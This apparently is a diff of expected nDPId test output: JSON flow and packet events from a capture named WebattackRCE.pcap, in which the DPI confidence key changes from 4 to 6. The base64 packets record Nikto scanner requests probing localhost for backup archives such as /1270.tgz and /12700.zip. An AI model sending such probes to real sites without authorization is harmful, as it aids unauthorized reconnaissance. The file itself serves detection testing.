00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":1,"flow_last_seen":1576420277196,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277196,"pkt":"AAAAAAAAAAAAAAAACABFAADASbJAAEAG8oN\/AAABfwAAAcQWH5DgxXEkcLyXoIAYAED+tAAAAQEICp1m\/PSdZvz0R0VUIC8xMjcwLnRneiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277196,"flow_last_seen":1576420277196,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277196,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50198,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277196,"flow_last_seen":1576420277196,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277196,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50198,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277198,"flow_last_seen":1576420277198,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277198,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":1,"flow_last_seen":1576420277198,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277198,"pkt":"AAAAAAAAAAAAAAAACABFAADAjLtAAEAGr3p\/AAABfwAAAcQYH5DOSLQrVcLjaIAYAED+tAAAAQEICp1m\/PadZvz2R0VUIC8xMjcwLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277198,"flow_last_seen":1576420277198,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277198,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277198,"flow_last_seen":1576420277198,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277198,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277200,"flow_last_seen":1576420277200,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277200,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":1,"flow_last_seen":1576420277200,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277200,"pkt":"AAAAAAAAAAAAAAAACABFAADFaNRAAEAG01x\/AAABfwAAAcQaH5BzoVBHI7Wyn4AYAED+uQAAAQEICp1m\/PidZvz4R0VUIC8xMjcuMC4wLjEudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277200,"flow_last_seen":1576420277200,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277200,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277200,"flow_last_seen":1576420277200,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277200,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277201,"flow_last_seen":1576420277201,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277201,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":1,"flow_last_seen":1576420277201,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277201,"pkt":"AAAAAAAAAAAAAAAACABFAADFz59AAEAGbJF\/AAABfwAAAcQcH5D4h\/cKGx\/I\/4AYAED+uQAAAQEICp1m\/PmdZvz5R0VUIC8xMjcuMC4wLjEudGd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277201,"flow_last_seen":1576420277201,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277201,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50204,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277201,"flow_last_seen":1576420277201,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277201,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50204,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277203,"flow_last_seen":1576420277203,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277203,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50206,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":1,"flow_last_seen":1576420277203,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277203,"pkt":"AAAAAAAAAAAAAAAACABFAADBfg5AAEAGviZ\/AAABfwAAAcQeH5A6WEaZ3wpBiYAYAED+tQAAAQEICp1m\/PudZvz7R0VUIC8xMjcwMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277203,"flow_last_seen":1576420277203,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277203,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50206,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277203,"flow_last_seen":1576420277203,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277203,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50206,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277204,"flow_last_seen":1576420277204,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277204,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50208,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":1,"flow_last_seen":1576420277204,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277204,"pkt":"AAAAAAAAAAAAAAAACABFAADBsIBAAEAGi7R\/AAABfwAAAcQgH5BX0ojsod\/7v4AYAED+tQAAAQEICp1m\/PydZvz8R0VUIC8xMjcwMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277204,"flow_last_seen":1576420277204,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277204,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50208,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277204,"flow_last_seen":1576420277204,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277204,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50208,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277206,"flow_last_seen":1576420277206,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277206,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50210,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":1,"flow_last_seen":1576420277206,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277206,"pkt":"AAAAAAAAAAAAAAAACABFAADEp6FAAEAGlJB\/AAABfwAAAcQiH5DXnp8L7+WKyYAYAED+uAAAAQEICp1m\/P6dZvz+R0VUIC8xMjcwLnRhci5iejIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277206,"flow_last_seen":1576420277206,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277206,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50210,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277206,"flow_last_seen":1576420277206,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277206,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50210,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277207,"flow_last_seen":1576420277207,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277207,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50212,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":1,"flow_last_seen":1576420277207,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277207,"pkt":"AAAAAAAAAAAAAAAACABFAADELblAAEAGDnl\/AAABfwAAAcQkH5A1yBUjW63h5IAYAED+uAAAAQEICp1m\/P+dZvz\/R0VUIC8xMjcwLnRhci5iejIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277207,"flow_last_seen":1576420277207,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277207,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50212,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":334,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277207,"flow_last_seen":1576420277207,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277207,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50212,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) 